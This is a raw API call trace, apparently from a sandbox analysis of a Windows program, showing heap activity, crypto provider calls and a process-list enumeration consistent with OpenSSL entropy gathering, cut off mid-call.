RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0091.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.103] GetCurrentThreadId () returned 0x8c4 [0091.103] GetVersionExA (in: lpVersionInformation=0x9ccf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x9ccf3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x9ccf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.103] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x754b0000 [0091.103] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e10000 [0091.103] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x733e0000 [0091.330] GetProcAddress (hModule=0x733e0000, lpProcName="NetStatisticsGet") returned 0x733e644f [0091.330] GetProcAddress (hModule=0x733e0000, lpProcName="NetApiBufferFree") returned 0x737e13d2 [0091.330] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x9ccf02c | out: Buffer=0x9ccf02c) returned 0x0 [0091.334] GetCurrentThreadId () returned 0x8c4 [0091.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.334] NetApiBufferFree (Buffer=0x312bc48) returned 0x0 [0091.335] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x9ccf02c | out: Buffer=0x9ccf02c) returned 0x0 [0091.424] GetCurrentThreadId () returned 0x8c4 [0091.424] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.424] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.424] NetApiBufferFree (Buffer=0x99d9c28) returned 0x0 [0091.424] FreeLibrary (hLibModule=0x733e0000) returned 1 [0091.428] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0091.428] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGenRandom") returned 0x754bdfc8 [0091.429] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0091.429] CryptAcquireContextW (in: phProv=0x9ccf018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccf018*=0x6deef8) returned 1 [0091.430] CryptGenRandom (in: hProv=0x6deef8, dwLen=0x40, pbBuffer=0x9ccf464 | out: pbBuffer=0x9ccf464) returned 1 [0091.430] GetCurrentThreadId () returned 0x8c4 [0091.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.430] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0091.431] CryptAcquireContextW (in: phProv=0x9ccf018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x9ccf018*=0x6deef8) returned 0 [0091.431] FreeLibrary (hLibModule=0x754b0000) returned 1 [0091.431] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0091.432] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0091.432] GetDesktopWindow () returned 0x10010 [0091.432] GetProcessWindowStation () returned 0x48 [0091.432] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x9ccefa0 | out: pvInfo=0x0, lpnLengthNeeded=0x9ccefa0) returned 0 [0091.432] GetLastError () returned 0x7a [0091.432] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x9ccef80, nLength=0x10, lpnLengthNeeded=0x9ccefa0 | out: pvInfo=0x9ccef80, lpnLengthNeeded=0x9ccefa0) returned 1 [0091.432] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x76780000 [0091.433] GetProcAddress (hModule=0x76780000, lpProcName="GetForegroundWindow") returned 0x767a2320 [0091.434] GetProcAddress (hModule=0x76780000, lpProcName="GetCursorInfo") returned 0x767f812f [0091.435] GetProcAddress (hModule=0x76780000, lpProcName="GetQueueStatus") returned 0x767a3924 [0091.435] GetForegroundWindow () returned 0x202ac [0091.435] GetCurrentThreadId () returned 0x8c4 [0091.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.435] GetCursorInfo (in: pci=0x9ccf450 | out: pci=0x9ccf450) returned 1 [0091.435] GetQueueStatus (flags=0xbf) returned 0x0 [0091.435] GetCurrentThreadId () returned 0x8c4 [0091.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.436] FreeLibrary (hLibModule=0x76780000) returned 1 [0091.436] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0091.437] GetProcAddress (hModule=0x76e10000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0091.437] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32First") returned 0x76ea5763 [0091.438] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32Next") returned 0x76ea594e [0091.438] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32ListFirst") returned 0x76ea5621 [0091.439] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32ListNext") returned 0x76ea56cb [0091.440] GetProcAddress (hModule=0x76e10000, lpProcName="Process32First") returned 0x76e48ae7 [0091.440] GetProcAddress (hModule=0x76e10000, lpProcName="Process32Next") returned 0x76e488a4 [0091.440] GetProcAddress (hModule=0x76e10000, lpProcName="Thread32First") returned 0x76ea5b93 [0091.441] GetProcAddress (hModule=0x76e10000, lpProcName="Thread32Next") returned 0x76ea5c3f [0091.441] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0091.442] GetProcAddress (hModule=0x76e10000, lpProcName="Module32Next") returned 0x76ea5dc2 [0091.442] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x6f4 [0091.462] GetTickCount () returned 0x1172169 [0091.462] Heap32ListFirst (hSnapshot=0x6f4, lphl=0x9ccf454) returned 1 [0091.463] GetCurrentThreadId () returned 0x8c4 [0091.463] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.463] Heap32First (lphe=0x9ccefc0, th32ProcessID=0x7f0, th32HeapID=0x680000) returned 1 [0091.508] GetCurrentThreadId () returned 0x8c4 [0091.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.508] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.534] GetTickCount () returned 0x11721b7 [0091.534] GetCurrentThreadId () returned 0x8c4 [0091.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.534] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.583] GetTickCount () returned 0x11721e6 [0091.583] GetCurrentThreadId () returned 0x8c4 [0091.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.583] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.621] GetTickCount () returned 0x1172205 [0091.621] GetCurrentThreadId () returned 0x8c4 [0091.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.621] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.656] GetTickCount () returned 0x1172234 [0091.656] GetCurrentThreadId () returned 0x8c4 [0091.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.656] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.690] GetTickCount () returned 0x1172253 [0091.691] GetCurrentThreadId () returned 0x8c4 [0091.691] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.691] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.721] GetTickCount () returned 0x1172272 [0091.721] GetCurrentThreadId () returned 0x8c4 [0091.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.721] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.754] GetTickCount () returned 0x1172292 [0091.755] GetCurrentThreadId () returned 0x8c4 [0091.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.755] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.793] GetTickCount () returned 0x11722b1 [0091.794] GetCurrentThreadId () returned 0x8c4 [0091.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.794] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.835] GetTickCount () returned 0x11722e0 [0091.835] GetCurrentThreadId () returned 0x8c4 [0091.835] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.835] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.875] GetTickCount () returned 0x117230e [0091.875] GetCurrentThreadId () returned 0x8c4 [0091.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.875] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.910] GetTickCount () returned 0x117232e [0091.910] GetCurrentThreadId () returned 0x8c4 [0091.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.910] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.949] GetTickCount () returned 0x117234d [0091.949] GetCurrentThreadId () returned 0x8c4 [0091.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.950] Heap32Next (lphe=0x9ccefc0) returned 1 [0091.977] GetTickCount () returned 0x117236c [0091.977] GetCurrentThreadId () returned 0x8c4 [0091.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0091.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0091.978] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.010] GetTickCount () returned 0x117238b [0092.010] GetCurrentThreadId () returned 0x8c4 [0092.010] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.010] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.010] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.045] GetTickCount () returned 0x11723ba [0092.045] GetCurrentThreadId () returned 0x8c4 [0092.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.045] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.076] GetTickCount () returned 0x11723d9 [0092.076] GetCurrentThreadId () returned 0x8c4 [0092.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.076] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.108] GetTickCount () returned 0x11723f8 [0092.108] GetCurrentThreadId () returned 0x8c4 [0092.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.108] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.145] GetTickCount () returned 0x1172418 [0092.145] GetCurrentThreadId () returned 0x8c4 [0092.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.145] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.181] GetTickCount () returned 0x1172437 [0092.181] GetCurrentThreadId () returned 0x8c4 [0092.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.181] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.209] GetTickCount () returned 0x1172456 [0092.210] GetCurrentThreadId () returned 0x8c4 [0092.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.210] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.244] GetTickCount () returned 0x1172475 [0092.244] GetCurrentThreadId () returned 0x8c4 [0092.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.245] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.271] GetTickCount () returned 0x1172494 [0092.271] GetCurrentThreadId () returned 0x8c4 [0092.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.272] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.302] GetTickCount () returned 0x11724b4 [0092.302] GetCurrentThreadId () returned 0x8c4 [0092.302] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.302] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.333] GetTickCount () returned 0x11724d3 [0092.333] GetCurrentThreadId () returned 0x8c4 [0092.333] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.334] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.387] GetTickCount () returned 0x1172511 [0092.387] GetCurrentThreadId () returned 0x8c4 [0092.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.388] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.430] GetTickCount () returned 0x1172530 [0092.430] GetCurrentThreadId () returned 0x8c4 [0092.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.430] Heap32Next (lphe=0x9ccefc0) returned 1 [0092.467] GetTickCount () returned 0x117255f [0092.467] Heap32ListNext (hSnapshot=0x6f4, lphl=0x9ccf454) returned 1 [0092.468] GetTickCount () returned 0x117255f [0092.468] GetTickCount () returned 0x117255f [0092.468] Process32First (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.470] GetCurrentThreadId () returned 0x8c4 [0092.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.470] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0092.471] GetTickCount () returned 0x117255f [0092.471] GetCurrentThreadId () returned 0x8c4 [0092.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.471] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0092.472] GetTickCount () returned 0x117255f [0092.472] GetCurrentThreadId () returned 0x8c4 [0092.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.473] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.474] GetTickCount () returned 0x117255f [0092.474] GetCurrentThreadId () returned 0x8c4 [0092.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.474] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0092.476] GetTickCount () returned 0x117255f [0092.476] GetCurrentThreadId () returned 0x8c4 [0092.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.477] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.478] GetTickCount () returned 0x117255f [0092.478] GetCurrentThreadId () returned 0x8c4 [0092.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.478] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0092.480] GetTickCount () returned 0x117255f [0092.480] GetCurrentThreadId () returned 0x8c4 [0092.480] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.480] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.480] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0092.481] GetTickCount () returned 0x117256f [0092.481] GetCurrentThreadId () returned 0x8c4 [0092.481] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.481] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.482] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0092.483] GetTickCount () returned 0x117256f [0092.483] GetCurrentThreadId () returned 0x8c4 [0092.483] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.483] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.483] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0092.484] GetTickCount () returned 0x117256f [0092.484] GetCurrentThreadId () returned 0x8c4 [0092.484] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.484] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.484] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.486] GetTickCount () returned 0x117256f [0092.486] GetCurrentThreadId () returned 0x8c4 [0092.486] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.486] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.486] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.487] GetTickCount () returned 0x117256f [0092.487] GetCurrentThreadId () returned 0x8c4 [0092.487] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.487] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.487] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.489] GetTickCount () returned 0x117256f [0092.489] GetCurrentThreadId () returned 0x8c4 [0092.489] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.489] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.489] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.491] GetTickCount () returned 0x117256f [0092.491] GetCurrentThreadId () returned 0x8c4 [0092.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.491] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.492] GetTickCount () returned 0x117256f [0092.492] GetCurrentThreadId () returned 0x8c4 [0092.492] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.492] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.492] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0092.494] GetTickCount () returned 0x117256f [0092.494] GetCurrentThreadId () returned 0x8c4 [0092.494] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.494] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.495] GetTickCount () returned 0x117256f [0092.495] GetCurrentThreadId () returned 0x8c4 [0092.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 